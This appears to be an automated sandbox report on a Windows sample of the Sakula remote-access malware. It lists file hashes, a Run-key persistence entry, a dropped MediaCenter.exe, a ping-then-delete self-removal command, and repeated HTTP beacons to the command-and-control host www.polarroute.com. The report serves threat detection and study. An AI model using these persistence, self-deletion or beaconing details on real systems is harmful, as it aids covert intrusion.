Analysis
-
max time kernel
128s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
09/01/2025, 20:30 UTC
Behavioral task
behavioral1
Sample
JaffaCakes118_d1abc3eb8ef2ea349269f836b8a65212.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
JaffaCakes118_d1abc3eb8ef2ea349269f836b8a65212.exe
Resource
win10v2004-20241007-en
General
-
Target
JaffaCakes118_d1abc3eb8ef2ea349269f836b8a65212.exe
-
Size
168KB
-
MD5
d1abc3eb8ef2ea349269f836b8a65212
-
SHA1
9c6bdf06e06e0fdf98dca643c2c00eab2523a980
-
SHA256
15d33eee644b3a7b2f7c08d5e87057130911a88555b7c25901adc701e957c21a
-
SHA512
c963504403ec5656a8b88289d2d991dcd41d5e63b97586b2a07af329ec79fd76066e443c428b47a586c5cc11a46ceebaa1c4aae2bc51d029fbc06db76392f452
-
SSDEEP
3072:M29DkEGRQixVSjLwes5G30Bg7uZwOuz/xS3iGpZMU:M29qRfVSndj30B3wBxE1+U
Malware Config
Extracted
sakula
www.polarroute.com
Signatures
-
Sakula family
-
Sakula payload 5 IoCs
resource yara_rule behavioral2/memory/3412-0-0x0000000000400000-0x0000000000420000-memory.dmp family_sakula behavioral2/memory/2376-4-0x0000000000400000-0x0000000000420000-memory.dmp family_sakula behavioral2/files/0x0008000000023cb2-3.dat family_sakula behavioral2/memory/3412-10-0x0000000000400000-0x0000000000420000-memory.dmp family_sakula behavioral2/memory/2376-19-0x0000000000400000-0x0000000000420000-memory.dmp family_sakula -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation JaffaCakes118_d1abc3eb8ef2ea349269f836b8a65212.exe -
Executes dropped EXE 1 IoCs
pid Process 2376 MediaCenter.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\MicroMedia = "C:\\Users\\Admin\\AppData\\Local\\Temp\\MicroMedia\\MediaCenter.exe" JaffaCakes118_d1abc3eb8ef2ea349269f836b8a65212.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JaffaCakes118_d1abc3eb8ef2ea349269f836b8a65212.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MediaCenter.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2144 cmd.exe 1964 PING.EXE -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1964 PING.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeIncBasePriorityPrivilege 3412 JaffaCakes118_d1abc3eb8ef2ea349269f836b8a65212.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 3412 wrote to memory of 2376 3412 JaffaCakes118_d1abc3eb8ef2ea349269f836b8a65212.exe 82 PID 3412 wrote to memory of 2376 3412 JaffaCakes118_d1abc3eb8ef2ea349269f836b8a65212.exe 82 PID 3412 wrote to memory of 2376 3412 JaffaCakes118_d1abc3eb8ef2ea349269f836b8a65212.exe 82 PID 3412 wrote to memory of 2144 3412 JaffaCakes118_d1abc3eb8ef2ea349269f836b8a65212.exe 91 PID 3412 wrote to memory of 2144 3412 JaffaCakes118_d1abc3eb8ef2ea349269f836b8a65212.exe 91 PID 3412 wrote to memory of 2144 3412 JaffaCakes118_d1abc3eb8ef2ea349269f836b8a65212.exe 91 PID 2144 wrote to memory of 1964 2144 cmd.exe 93 PID 2144 wrote to memory of 1964 2144 cmd.exe 93 PID 2144 wrote to memory of 1964 2144 cmd.exe 93
Processes
-
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_d1abc3eb8ef2ea349269f836b8a65212.exe"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_d1abc3eb8ef2ea349269f836b8a65212.exe"1⤵
- Checks computer location settings
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3412 -
C:\Users\Admin\AppData\Local\Temp\MicroMedia\MediaCenter.exeC:\Users\Admin\AppData\Local\Temp\MicroMedia\MediaCenter.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2376
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 & del /q "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_d1abc3eb8ef2ea349269f836b8a65212.exe"2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2144 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.13⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1964
-
-
Network
-
Remote address:8.8.8.8:53Requestwww.polarroute.comIN AResponsewww.polarroute.comIN A76.223.54.146www.polarroute.comIN A13.248.169.48
-
POSThttp://www.polarroute.com/newimage.asp?imageid=fcqrowju805383798&type=0&resid=240630093MediaCenter.exeRemote address:76.223.54.146:80RequestPOST /newimage.asp?imageid=fcqrowju805383798&type=0&resid=240630093 HTTP/1.1
User-Agent: iexplorer
Host: www.polarroute.com
Content-Length: 176
Cache-Control: no-cache
ResponseHTTP/1.1 405 Method Not Allowed
-
Remote address:76.223.54.146:80RequestGET /photo/fcqrowju805383798.jpg?resid=240631484 HTTP/1.1
User-Agent: iexplorer
Host: www.polarroute.com
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
date: Thu, 09 Jan 2025 20:30:13 GMT
content-length: 130
-
GEThttp://www.polarroute.com/viewphoto.asp?resid=240631625&photoid=fcqrowju805383798MediaCenter.exeRemote address:76.223.54.146:80RequestGET /viewphoto.asp?resid=240631625&photoid=fcqrowju805383798 HTTP/1.1
User-Agent: iexplorer
Host: www.polarroute.com
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
date: Thu, 09 Jan 2025 20:30:13 GMT
content-length: 156
-
Remote address:8.8.8.8:53Request60.153.16.2.in-addr.arpaIN PTRResponse60.153.16.2.in-addr.arpaIN PTRa2-16-153-60deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request104.219.191.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request20.160.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request146.54.223.76.in-addr.arpaIN PTRResponse146.54.223.76.in-addr.arpaIN PTRa904c694c05102f30awsglobalacceleratorcom
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request58.55.71.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request149.220.183.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request212.20.149.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request198.187.3.20.in-addr.arpaIN PTRResponse
-
POSThttp://www.polarroute.com/newimage.asp?imageid=fcqrowju805383798&type=0&resid=240662781MediaCenter.exeRemote address:76.223.54.146:80RequestPOST /newimage.asp?imageid=fcqrowju805383798&type=0&resid=240662781 HTTP/1.1
User-Agent: iexplorer
Host: www.polarroute.com
Content-Length: 176
Cache-Control: no-cache
ResponseHTTP/1.1 405 Method Not Allowed
-
Remote address:76.223.54.146:80RequestGET /photo/fcqrowju805383798.jpg?resid=240663031 HTTP/1.1
User-Agent: iexplorer
Host: www.polarroute.com
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
date: Thu, 09 Jan 2025 20:30:44 GMT
content-length: 130
-
GEThttp://www.polarroute.com/viewphoto.asp?resid=240663156&photoid=fcqrowju805383798MediaCenter.exeRemote address:76.223.54.146:80RequestGET /viewphoto.asp?resid=240663156&photoid=fcqrowju805383798 HTTP/1.1
User-Agent: iexplorer
Host: www.polarroute.com
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
date: Thu, 09 Jan 2025 20:30:44 GMT
content-length: 156
-
Remote address:8.8.8.8:53Request98.117.19.2.in-addr.arpaIN PTRResponse98.117.19.2.in-addr.arpaIN PTRa2-19-117-98deploystaticakamaitechnologiescom
-
POSThttp://www.polarroute.com/newimage.asp?imageid=fcqrowju805383798&type=0&resid=240694312MediaCenter.exeRemote address:76.223.54.146:80RequestPOST /newimage.asp?imageid=fcqrowju805383798&type=0&resid=240694312 HTTP/1.1
User-Agent: iexplorer
Host: www.polarroute.com
Content-Length: 176
Cache-Control: no-cache
ResponseHTTP/1.1 405 Method Not Allowed
-
Remote address:76.223.54.146:80RequestGET /photo/fcqrowju805383798.jpg?resid=240694562 HTTP/1.1
User-Agent: iexplorer
Host: www.polarroute.com
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
date: Thu, 09 Jan 2025 20:31:16 GMT
content-length: 130
-
GEThttp://www.polarroute.com/viewphoto.asp?resid=240694687&photoid=fcqrowju805383798MediaCenter.exeRemote address:76.223.54.146:80RequestGET /viewphoto.asp?resid=240694687&photoid=fcqrowju805383798 HTTP/1.1
User-Agent: iexplorer
Host: www.polarroute.com
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
date: Thu, 09 Jan 2025 20:31:16 GMT
content-length: 156
-
Remote address:8.8.8.8:53Request11.227.111.52.in-addr.arpaIN PTRResponse
-
POSThttp://www.polarroute.com/newimage.asp?imageid=fcqrowju805383798&type=0&resid=240725843MediaCenter.exeRemote address:76.223.54.146:80RequestPOST /newimage.asp?imageid=fcqrowju805383798&type=0&resid=240725843 HTTP/1.1
User-Agent: iexplorer
Host: www.polarroute.com
Content-Length: 176
Cache-Control: no-cache
ResponseHTTP/1.1 405 Method Not Allowed
-
Remote address:76.223.54.146:80RequestGET /photo/fcqrowju805383798.jpg?resid=240726093 HTTP/1.1
User-Agent: iexplorer
Host: www.polarroute.com
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
date: Thu, 09 Jan 2025 20:31:47 GMT
content-length: 130
-
GEThttp://www.polarroute.com/viewphoto.asp?resid=240726234&photoid=fcqrowju805383798MediaCenter.exeRemote address:76.223.54.146:80RequestGET /viewphoto.asp?resid=240726234&photoid=fcqrowju805383798 HTTP/1.1
User-Agent: iexplorer
Host: www.polarroute.com
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
date: Thu, 09 Jan 2025 20:31:48 GMT
content-length: 156
-
POSThttp://www.polarroute.com/newimage.asp?imageid=fcqrowju805383798&type=0&resid=240757390MediaCenter.exeRemote address:76.223.54.146:80RequestPOST /newimage.asp?imageid=fcqrowju805383798&type=0&resid=240757390 HTTP/1.1
User-Agent: iexplorer
Host: www.polarroute.com
Content-Length: 176
Cache-Control: no-cache
ResponseHTTP/1.1 405 Method Not Allowed
-
Remote address:76.223.54.146:80RequestGET /photo/fcqrowju805383798.jpg?resid=240757625 HTTP/1.1
User-Agent: iexplorer
Host: www.polarroute.com
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
date: Thu, 09 Jan 2025 20:32:19 GMT
content-length: 130
-
GEThttp://www.polarroute.com/viewphoto.asp?resid=240757765&photoid=fcqrowju805383798MediaCenter.exeRemote address:76.223.54.146:80RequestGET /viewphoto.asp?resid=240757765&photoid=fcqrowju805383798 HTTP/1.1
User-Agent: iexplorer
Host: www.polarroute.com
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
date: Thu, 09 Jan 2025 20:32:19 GMT
content-length: 156
-
76.223.54.146:80http://www.polarroute.com/viewphoto.asp?resid=240631625&photoid=fcqrowju805383798httpMediaCenter.exe1.1kB 796 B 11 6
HTTP Request
POST http://www.polarroute.com/newimage.asp?imageid=fcqrowju805383798&type=0&resid=240630093HTTP Response
405HTTP Request
GET http://www.polarroute.com/photo/fcqrowju805383798.jpg?resid=240631484HTTP Response
200HTTP Request
GET http://www.polarroute.com/viewphoto.asp?resid=240631625&photoid=fcqrowju805383798HTTP Response
200 -
76.223.54.146:80http://www.polarroute.com/viewphoto.asp?resid=240663156&photoid=fcqrowju805383798httpMediaCenter.exe1.1kB 796 B 10 6
HTTP Request
POST http://www.polarroute.com/newimage.asp?imageid=fcqrowju805383798&type=0&resid=240662781HTTP Response
405HTTP Request
GET http://www.polarroute.com/photo/fcqrowju805383798.jpg?resid=240663031HTTP Response
200HTTP Request
GET http://www.polarroute.com/viewphoto.asp?resid=240663156&photoid=fcqrowju805383798HTTP Response
200 -
76.223.54.146:80http://www.polarroute.com/viewphoto.asp?resid=240694687&photoid=fcqrowju805383798httpMediaCenter.exe1.1kB 796 B 10 6
HTTP Request
POST http://www.polarroute.com/newimage.asp?imageid=fcqrowju805383798&type=0&resid=240694312HTTP Response
405HTTP Request
GET http://www.polarroute.com/photo/fcqrowju805383798.jpg?resid=240694562HTTP Response
200HTTP Request
GET http://www.polarroute.com/viewphoto.asp?resid=240694687&photoid=fcqrowju805383798HTTP Response
200 -
76.223.54.146:80http://www.polarroute.com/viewphoto.asp?resid=240726234&photoid=fcqrowju805383798httpMediaCenter.exe1.1kB 796 B 10 6
HTTP Request
POST http://www.polarroute.com/newimage.asp?imageid=fcqrowju805383798&type=0&resid=240725843HTTP Response
405HTTP Request
GET http://www.polarroute.com/photo/fcqrowju805383798.jpg?resid=240726093HTTP Response
200HTTP Request
GET http://www.polarroute.com/viewphoto.asp?resid=240726234&photoid=fcqrowju805383798HTTP Response
200 -
76.223.54.146:80http://www.polarroute.com/viewphoto.asp?resid=240757765&photoid=fcqrowju805383798httpMediaCenter.exe1.0kB 756 B 9 5
HTTP Request
POST http://www.polarroute.com/newimage.asp?imageid=fcqrowju805383798&type=0&resid=240757390HTTP Response
405HTTP Request
GET http://www.polarroute.com/photo/fcqrowju805383798.jpg?resid=240757625HTTP Response
200HTTP Request
GET http://www.polarroute.com/viewphoto.asp?resid=240757765&photoid=fcqrowju805383798HTTP Response
200
-
64 B 96 B 1 1
DNS Request
www.polarroute.com
DNS Response
76.223.54.14613.248.169.48
-
70 B 133 B 1 1
DNS Request
60.153.16.2.in-addr.arpa
-
73 B 147 B 1 1
DNS Request
104.219.191.52.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
20.160.190.20.in-addr.arpa
-
72 B 128 B 1 1
DNS Request
146.54.223.76.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
70 B 144 B 1 1
DNS Request
58.55.71.13.in-addr.arpa
-
73 B 147 B 1 1
DNS Request
149.220.183.52.in-addr.arpa
-
72 B 146 B 1 1
DNS Request
212.20.149.52.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
198.187.3.20.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
98.117.19.2.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
11.227.111.52.in-addr.arpa
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
168KB
MD52ad7a6a578c199bfe4bdef09b4130517
SHA154251ded370d3bf8f3e8192df819e6b79df1e101
SHA25680e59f5453d3a328eb880551711963537d1d99f23ca53c5af0dd6fb5b042deed
SHA51295f48fede36b0db70f244bcf7f10b0c03bdc9e4e89cd5c5a6a6f7de268c9a4cb18443626e258b75e99a4b0f097e104b955e5a98dd7246d57097041dc3b2462fe